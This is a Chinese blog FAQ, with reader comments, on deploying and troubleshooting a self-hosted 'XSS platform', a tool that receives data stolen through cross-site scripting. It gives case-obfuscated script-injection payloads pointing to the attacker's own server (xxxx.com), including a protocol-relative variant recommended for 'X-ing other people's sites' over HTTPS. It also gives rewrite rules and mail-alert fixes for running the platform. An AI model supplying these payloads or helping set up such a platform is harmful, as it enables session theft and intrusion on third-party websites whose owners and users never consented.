如何让XSS平台支持HTTPS – 各种XSS平台问题锦集
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
前言:网上可以下载的XSS平台源码总共就那么几个,比较少吧,我在16年9月份发布了【最新特别完善版XSS平台源代码】,网上的70%的平台用的都是这套程序。之后经常遇到各种朋友来问我关于XSS的各种相关问题,其中跟XSS平台相关的问题比较多。这里我列举了几个最多的问题做一一的解答。
第一个问题:
如何让XSS平台支持HTTPS?
答:首先这里含有一个隐藏的问题,就是"XSS平台"需要支持HTTPS吗?我个人的答案是”不需要”。那如何XSS带有HTTPS的站点,其实很简单,首先你需要明白,对方如果是https的站点,那么按照网站通讯原理,它只能加载https的代码。那问题就简单了,我们只需要让我们的xss平台的项目代码支持https即可。
首先正常安装XSS平台,安装完,访问所有的功能都正常后。让网站支持https,这里要注意,伪静态规则什么的千万都不要动。既然网站支持HTTPS了,那么咱们看一下项目代码,这里举例,例如咱们的项目代码是
</tExtArEa>'"><sCRiPt sRC=http://xxxx.com/xxxx></sCrIpT>
那我们访问一下上面项目中的蓝色的那个网址(注意,上面默认的是http的),我们可以改成https的访问一下试试。https://xxxx.com/xxxx 当你打开的时候,正常的显示了你的项目代码,那么就是成功了。完全没必要让平台支持https,项目代码这里支持就可以。然后默认模块的代码处把http也改成https即可。如下图:
问题二:
访问平台项目代码会出现页面404,例如访问http://xxxx.com/xxxx 出现404如何解决?
答:这个问题10有89是XSS平台伪静态规则没有生效出问题了。首先看一下,自带的默认规则是:
RewriteEngine On
RewriteBase /
RewriteRule ^([0-9a-zA-Z]{4})$ xss.php?do=code&urlKey=$1
RewriteRule ^([0-9a-zA-Z]{6})$ xss.php?do=code&urlKey=$1
RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ xss.php?do=do&auth=$1&domain=$3
RewriteRule ^register/(.*?)$ xss.php?do=register&key=$1
RewriteRule ^register-validate/(.*?)$ xss.php?do=register&act=validate&key=$1
RewriteRule ^login$ xss.php?do=login
这是XSS平台默认的规则,如果这个规则不可以,就请更改XSS平台的伪静态规则文件.htaccess换成如下代码。
RewriteEngine On
RewriteBase /
rewrite "^/([0-9a-zA-Z]{4})$" /xss.php?do=code&urlKey=$1;
rewrite "^/([0-9a-zA-Z]{6})$" /xss.php?do=code&urlKey=$1;
rewrite ^/do/auth/(w+?)(/domain/([w.]+?))?$ /xss.php?do=do&auth=$1&domain=$3;
rewrite ^/register/(.*?)$ /xss.php?do=register&key=$1;
rewrite ^/register-validate/(.*?)$ /xss.php?do=register&act=validate&key=$1;
rewrite ^/login$ /xss.php?do=login;
这里还有另一个可能性,就是你把XSS平台源码放进了二级目录,如果是这样,那你需要更改一下伪静态。需要在伪静态代码前面加入:
RewriteBase /www
问题三:
xss平台为什么发不了信?XSS平台无法发送邮件提示?
答:首先你要确认你的空间绝对支持PHP发信,你自己可以随便找一个发信的文件测试一下。 建议用163的邮箱发送邮件。
php.ini这个中的extension=php_sockets.dll这个模块一定是要开启的,如果还不可以,那就可能不支持默认的发信方法,需要更改一下发信规则转换成ssl的发信方法。
具体方法为首先找到source文件夹,然后打开里面的function.php文件,然后如下图所示更改。
问题四:
XSS平台设置好后错误或者空白,或者登录后空白??
答:注意你的PHP版本问题,选5.3版本或者php 5.4版本然后再试试。或者5.6的PHP版本!!!!
最终实在实在实在不行,请你用wampserver 这个软件搭建环境,然后测试。【亲测无误!!!】
细节一:
1 | <sCRiPt sRC=//xxxx.com/xxx></sCrIpT> |
大家X别人网站的时候,建议用上面的方法,注意上面, 并没有放入http或者https,这样X如别人的网站,XSS会自动适应对方的网站,如果对方网站是https那么,这里会自动变成https://xxxxx.com/xxx 如果对方的网站是http那么这里就会自动走http的协议。。。
这里推荐大家看看 Xss平台详细使用教程 相信你绝对会有收获。
用163也不行
你好,请问下nginx伪静态规则,设置好伪静态后,网站的连接需要手动更改吗?发现配置好伪静态网站URL地址还一直是动态的地址
不需要的,只需要开启为伪静态就可以,我记得默认是开启伪静态的。
那为啥我折腾半天,网站的地址还是没有改变呢?我访问 dsad/1.jpg 这样的图片js都能成功,说明伪静态是布置好了的,但是网站的连接全部都还是动态的,另外大佬,你邮箱被腾讯拉黑了,才看到垃圾箱
啥时候发个支持php7的版本。。。
大佬,密码找回代码可否分享一波? 😐
xss平台我搭建好了,就是在注册的时候出现:出错了,请联系管理员
这个错误,是我哪里配置错了么
lnmp(php5.6/5.5 下空白页)
我就是想来看看有没有人在linux下用lnmp搭建成功的….
呃。。终于OK了…我就说版本应该不是问题 🙁 结果是权限问题…已经搞好了 大佬 😀
朋友你后台能登录吗?
访问xss.php?do=login 是空白是怎么回事呢??
apache2.4,php5.6,网页目录的权限也都是777了,还是访问xss.php?do=login空白
大佬我能正常访问首页但是访问 /admin/index.php的时候就会出现 Access Denied 这个错误,请问这个怎么解决啊,主页是能正常访问,
望回复
宝塔Linux nginx php5.6,伪静态转换过了